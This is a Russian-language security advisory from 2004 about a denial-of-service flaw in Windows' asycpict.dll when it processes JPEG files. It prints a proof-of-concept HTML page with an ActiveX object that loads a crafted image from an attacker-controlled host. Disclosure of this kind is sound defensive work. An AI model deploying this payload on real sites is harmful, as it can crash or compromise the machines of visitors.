Отказ в обслуживании в Microsoft Windows

Дата публикации:	18.10.2004
Всего просмотров:	1772
Опасность:	Высокая
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
	Уязвимые версии: Microsoft Windows (All versions) Описание: Уязвимость обнаружена в Microsoft Windows. Удаленный атакующий может вызвать отказ в обслуживании или выполнить произвольный код. Уязвимость обнаружена в 'asycpict.dll' при обработке JPEG файла. Удаленный атакующий с помощью специально сформированной HTML страницы и JPEG файла может вызвать отказ в обслуживании. Пример: <HTML> < HEAD> < TITLE>Think of something clever!</TITLE> < /HEAD> < BODY> < OBJECT ID="ExploitImage" WIDTH="96" HEIGHT="96" CLASSID="CLSID:D4A97620-8E8F-11CF-93CD-00AA00C08FDF" CODEBASE="http://activex.microsoft.com/controls/mspert10.cab"> < PARAM NAME="BorderStyle" VALUE="0"> < PARAM NAME="SizeMode" VALUE="3"> < PARAM NAME="Size" VALUE="2540;2540"> < PARAM NAME="PicturePath" VALUE="http://[attacker]/freeze_system.jpg"> < PARAM NAME="PictureAlignment" VALUE="0"> < PARAM NAME="VariousPropertyBits" VALUE="19"> < /OBJECT> < /BODY> < /HTML> URL производителя: www.microsoft.com Решение: Решение не существует на данный момент
Ссылки:	Microsoft asycpict.dll 1.0 Remote JPEG DoS Attack Vulnerability

Отказ в обслуживании в Microsoft Windows

Подпишитесь на email рассылку